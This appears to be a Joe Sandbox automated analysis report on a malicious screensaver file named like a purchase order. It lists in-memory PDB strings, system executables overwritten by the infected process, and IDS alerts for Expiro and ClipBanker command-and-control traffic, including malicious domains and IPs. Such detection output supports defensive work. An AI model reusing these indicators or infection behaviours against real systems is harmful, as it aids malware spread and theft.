                  Source: PO#_1100015533.scrJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: PO#_1100015533.scrStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: C:\Windows\System32\msdtc.exeFile created: C:\Windows\DtcInstall.log
                  Source: PO#_1100015533.scrStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: msiexec.pdb source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\ktab_objs\ktab.pdb source: armsvc.exe, 0000000B.00000003.528121560.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\setupexe\x64\ship\0\setup.pdbx64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\klist_objs\klist.pdb source: armsvc.exe, 0000000B.00000003.527912305.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vssvc.pdb source: armsvc.exe, 0000000B.00000003.456410377.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.464565627.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, VSSVC.exe.11.dr
                  Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb\ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: sppsvc.pdb source: armsvc.exe, 0000000B.00000003.445848653.0000000002570000.00000004.00001000.00020000.00000000.sdmp, sppsvc.exe.11.dr
                  Source: Binary string: PresentationFontCache.pdb source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msiexec.pdbE3 source: armsvc.exe, 0000000B.00000003.435423769.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.435188760.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe.11.dr
                  Source: Binary string: aspnet_state.pdb source: armsvc.exe, 0000000B.00000003.382154090.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, aspnet_state.exe.11.dr
                  Source: Binary string: _.pdb source: PO#_1100015533.scr, 00000008.00000002.393446054.0000000002950000.00000004.08000000.00040000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.394485732.0000000003FA4000.00000004.00000800.00020000.00000000.sdmp, PO#_1100015533.scr, 00000008.00000002.393542161.0000000002AD3000.00000004.00000020.00020000.00000000.sdmp, hVVSnrrP.exe, 00000035.00000002.614225292.0000000003F13000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\servertool_objs\servertool.pdb source: armsvc.exe, 0000000B.00000003.530679334.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: FXSSVC.pdb source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb@SH source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\worksconv\x86\ship\0\wkconv.pdb86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehSched.pdb source: armsvc.exe, 0000000B.00000003.416561300.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdbD source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb@SH source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: locator.pdb source: armsvc.exe, 0000000B.00000003.444541638.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443059564.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.443304404.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdbE3 source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: x64\ship\0\setup.exe\bbtopt\setupO.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\jjs_objs\jjs.pdb source: armsvc.exe, 0000000B.00000003.527378625.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\pack200_objs\pack200.pdb source: armsvc.exe, 0000000B.00000003.528425595.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdb source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
                  Source: Binary string: FXSSVC.pdbH source: armsvc.exe, 0000000B.00000003.418018700.0000000002220000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.418338317.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wbengine.pdb source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\setupexe\x64\ship\0\setup.pdb source: armsvc.exe, 0000000B.00000003.517297171.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: VSTOInstaller.pdb source: armsvc.exe, 0000000B.00000003.577349873.0000000001480000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.577330836.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: dllhost.pdb source: armsvc.exe, 0000000B.00000003.406747169.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.411082101.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.406378900.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \ship\0\msohtmed.exe\bbtopt\msohtmedO.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\tnameserv_objs\tnameserv.pdb source: armsvc.exe, 0000000B.00000003.532521819.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WMPNetwk.pdb source: armsvc.exe, 0000000B.00000003.490450790.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.498920191.0000000001C80000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\misc_hev\x86\ship\0\msohtmed.pdb source: armsvc.exe, 0000000B.00000003.585848853.00000000019E0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: SearchIndexer.pdb source: armsvc.exe, 0000000B.00000003.513401630.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, SearchIndexer.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\kinit_objs\kinit.pdb source: armsvc.exe, 0000000B.00000003.527765459.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdate_unsigned.pdb source: armsvc.exe, 0000000B.00000003.581129841.00000000019D0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdb source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmiregistry_objs\rmiregistry.pdb source: armsvc.exe, 0000000B.00000003.528742519.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr
                  Source: Binary string: PerfHost.pdb source: armsvc.exe, 0000000B.00000003.442858130.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441621041.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.441414190.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dw20.pdb\x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb\ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\orbd_objs\orbd.pdb source: armsvc.exe, 0000000B.00000003.528293885.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: WmiApSrv.pdb source: armsvc.exe, 0000000B.00000003.488416552.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: vds.pdbH source: armsvc.exe, 0000000B.00000003.453316185.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.449463705.0000000002220000.00000004.00001000.00020000.00000000.sdmp, vds.exe.11.dr
                  Source: Binary string: wbengine.pdb@SH source: armsvc.exe, 0000000B.00000003.469285797.0000000002500000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.479538599.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, wbengine.exe.11.dr
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\delivery\x64\ship\0\ose.pdby\x64\ship\0\ose.exe\bbtopt\oseO.pdb D source: OSE.EXE.11.dr
                  Source: Binary string: \ship\0\dwtrig20.exe\bbtopt\dwtrig20O.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb? source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: i0C:\Windows\mscorlib.pdb source: hVVSnrrP.exe, 00000035.00000002.548197085.0000000000678000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: msdtcexe.pdb source: armsvc.exe, 0000000B.00000003.430102360.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.429418798.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, msdtc.exe.11.dr
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\keytool_objs\keytool.pdb source: armsvc.exe, 0000000B.00000003.527614057.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.403965054.0000000005058000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 86\ship\0\wkconv.exe\bbtopt\wkconvO.pdb source: armsvc.exe, 0000000B.00000003.577175995.0000000002220000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\rmid_objs\rmid.pdb source: armsvc.exe, 0000000B.00000003.528636073.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: armsvc.exe, 0000000B.00000003.421750632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\java-rmi_objs\java-rmi.pdb source: armsvc.exe, 0000000B.00000003.523640565.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: mscorsvw.pdb source: armsvc.exe, 0000000B.00000003.393419599.0000000001B70000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.403111110.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.405006368.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.395627106.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.389710168.0000000001EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.394676525.0000000001F30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.402917632.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\re\workspace\8-2-build-windows-amd64-cygwin\jdk8u121\8372\build\windows-amd64\jdk\objs\policytool_objs\policytool.pdb source: armsvc.exe, 0000000B.00000003.528519701.0000000001480000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: snmptrap.pdb source: armsvc.exe, 0000000B.00000003.444842807.0000000001F40000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444694493.0000000001EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445682403.0000000001E30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444714229.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444889546.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444863016.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444876161.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.444772908.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.445599387.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: t:\dw\x86\ship\0\dwtrig20.pdb source: armsvc.exe, 0000000B.00000003.517600190.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: \x86\ship\0\dw20.exe\bbtopt\dw20O.pdb source: armsvc.exe, 0000000B.00000003.517450314.0000000001510000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ieetwcollector.pdbH source: armsvc.exe, 0000000B.00000003.423169335.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.423336271.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\toolkit\components\maintenanceservice\maintenanceservice.pdb source: armsvc.exe, 0000000B.00000003.428010284.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ehRecvr.pdb source: armsvc.exe, 0000000B.00000003.412276451.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: y\x64\ship\0\ose.exe\bbtopt\oseO.pdb source: armsvc.exe, 0000000B.00000003.516585836.0000000001490000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 0000000B.00000003.437390553.0000000001ED0000.00000004.00001000.00020000.00000000.sdmp, OSE.EXE.11.dr

                  Spreading

                  barindex
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\ehome\ehsched.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Windows\System32\alg.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\dllhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\ieetwcollector.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                  Source: C:\Users\user\Desktop\PO#_1100015533.scrSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\sppsvc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
                  Source: C:\Windows\ehome\ehrecvr.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:60507 -> 8.8.8.8:53
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:59447 -> 8.8.8.8:53
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.22:56475 -> 8.8.8.8:53
                  Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.22:49194 -> 82.112.184.197:80
                  Source: Network trafficSuricata IDS: 2034983 - Severity 1 - ET MALWARE Win32/ClipBanker.OC CnC Activity M2 : 192.168.2.22:49183 -> 82.112.184.197:80
                  Source: Network trafficSuricata IDS: 2034983 - Severity 1 - ET MALWARE Win32/ClipBanker.OC CnC Activity M2 : 192.168.2.22:49175 -> 54.244.188.177:80
                  Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.22:52781 -> 8.8.8.8:53
                  Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.22:50568 -> 8.8.8.8:53
                  Source: unknownNetwork traffic detected: DNS query count 35
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 13.248.148.254 13.248.148.254
                  Source: Joe Sandbox ViewIP Address: 3.94.10.34 3.94.10.34
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeDNS query: name: checkip.dyndns.org
                  Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.22:49188
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.22:49182
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.22:49188
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.22:49182
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.22:49213
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.22:49213
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.22:49211
                  Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.22:49214
                  Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.22:49211
